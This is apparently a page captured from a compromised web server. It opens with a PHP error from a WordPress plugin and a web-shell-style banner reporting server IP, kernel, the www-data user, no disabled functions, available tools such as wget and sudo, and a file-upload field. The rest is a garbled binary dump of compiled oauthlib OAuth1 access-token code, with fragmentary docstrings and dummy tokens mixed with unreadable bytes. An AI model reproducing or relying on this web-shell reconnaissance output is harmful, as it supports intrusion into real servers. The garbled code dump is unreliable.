Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /nuitka/eggshell.build/ |
Upload File : |
�� �request_validator�.�� �
get_realms�.�� �resource_owner_key�.��
�realms�.�� �oauth_token�.�� �token_generator�.�� �oauth_token_secret�.�� �oauth_authorized_realms�.�� � �.�� �save_access_token�.��
� urlencode�.�� �items�.��O XH Create and save a new access token.
Similar to OAuth 2, indication of granted scopes will be included as a
space separated list in ``oauth_authorized_realms``.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:returns: The token as an urlencoded string.
�.��7 }��Content-Type��!application/x-www-form-urlencoded�s.�� �_create_request�.��! �validate_access_token_request�.��* �&too many values to unpack (expected 2)�.�� �create_access_token�.�� �invalidate_request_token�.�� �
client_key�.�K�.�� }�NM���.��
�errors�.�� �OAuth1Error�.�� �
urlencoded�.�� �status_code�.�� X Create an access token response, with a new request token if valid.
:param uri: The full URI of the token request.
:param http_method: A valid HTTP verb, i.e. GET, POST, PUT, HEAD, etc.
:param body: The request body as a string.
:param headers: The request headers as a dict.
:param credentials: A list of extra credentials to include in the token.
:returns: A tuple of 3 elements.
1. A dict of headers to set on the response.
2. The response body as a string.
3. The response status code as an integer.
An example of a valid request::
>>> from your_validator import your_validator
>>> from oauthlib.oauth1 import AccessTokenEndpoint
>>> endpoint = AccessTokenEndpoint(your_validator)
>>> h, b, s = endpoint.create_access_token_response(
... 'https://your.provider/access_token?foo=bar',
... headers={
... 'Authorization': 'OAuth oauth_token=234lsdkf....'
... },
... credentials={
... 'my_specific': 'argument',
... })
>>> h
{'Content-Type': 'application/x-www-form-urlencoded'}
>>> b
'oauth_token=lsdkfol23w54jlksdef&oauth_token_secret=qwe089234lkjsdf&oauth_authorized_realms=movies+pics&my_specific=argument'
>>> s
200
An response to invalid request would have a different body and status::
>>> b
'error=invalid_request&description=missing+resource+owner+key'
>>> s
400
The same goes for an an unauthorized request:
>>> b
''
>>> s
401
�.�� �_check_transport_security�.�� �_check_mandatory_parameters�.�� �InvalidRequestError�.�� �Missing resource owner.���.�� �description���.�� �check_request_token�.��( �"Invalid resource owner key format.���.�� �verifier�.�� �Missing verifier.���.�� �check_verifier�.�� �Invalid verifier format.���.�� �validate_timestamp_and_nonce�.��
� timestamp�.�� �nonce�.�� �
request_token���.�� �validate_client_key�.�� �dummy_client�.�� �validate_request_token�.�� �dummy_request_token�.�� �validate_verifier�.�� �_check_signature�.�� }��is_token_request��s.�� �
validator_log�.��
�client�.�� �resource_owner�.��
� signature�.�� �log�.�� �info�.��, �&[Failure] request verification failed.���.�� �Valid client:, %s�.�� �Valid token:, %s�.�� �Valid verifier:, %s�.�� �Valid signature:, %s�.��Q XJ Validate an access token request.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:raises: OAuth1Error if the request is invalid.
:returns: A tuple of 2 elements.
1. The validation result (True or False).
2. The request object.
�.��Y XR
oauthlib.oauth1.rfc5849.endpoints.access_token
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module is an implementation of the access token provider logic of
OAuth 1.0 RFC 5849. It validates the correctness of access token requests,
creates and persists tokens as well as create the proper response to be
returned to the client.
�.�� �__doc__�.��T �P/usr/lib/python3/dist-packages/oauthlib/oauth1/rfc5849/endpoints/access_token.py�.�� �__file__�.�� �__spec__�.��
�origin�.�� �has_location�.�� �
__cached__�.�� �absolute_import�.�� �unicode_literals�.�� �logging�.�K .�� �oauthlib.common�.�� h
��.�� � �.�� h��.�K.�� �base�.�� �BaseEndpoint���.�K.�hW.��
� getLogger�.��4 �.oauthlib.oauth1.rfc5849.endpoints.access_token���.��
� metaclass�.�� �__prepare__�.�� �AccessTokenEndpoint�.�� �__getitem__�.��2 �.%s.__prepare__() must return a mapping, not %s�.�� �__name__�.�� �<metaclass>�.��2 �.oauthlib.oauth1.rfc5849.endpoints.access_token�.�� �
__module__�.��� X� An endpoint responsible for providing OAuth 1 access tokens.
Typical use is to instantiate with a request validator and invoke the
``create_access_token_response`` from a view function. The tuple returned
has all information necessary (body, status, headers) to quickly form
and return a proper response. See :doc:`/oauth1/validator` for details on which
validator methods to implement for this endpoint.
�.�� �__qualname__�.��+ �'AccessTokenEndpoint.create_access_token�.��
(�GET�NNNt�.�� �create_access_token_response�.��4 �0AccessTokenEndpoint.create_access_token_response�.��5 �1AccessTokenEndpoint.validate_access_token_request�.�� �__orig_bases__�.��; �7<module oauthlib.oauth1.rfc5849.endpoints.access_token>�.�� � __class__���.��+ (�self��request��credentials��token�t�.��` (hq�uri��http_method��body��headers�hs�resp_headers�hr�valid��processed_request�ht�e�t�.��U (hqhr�valid_client��valid_resource_owner��valid_verifier��valid_signature��v�t�.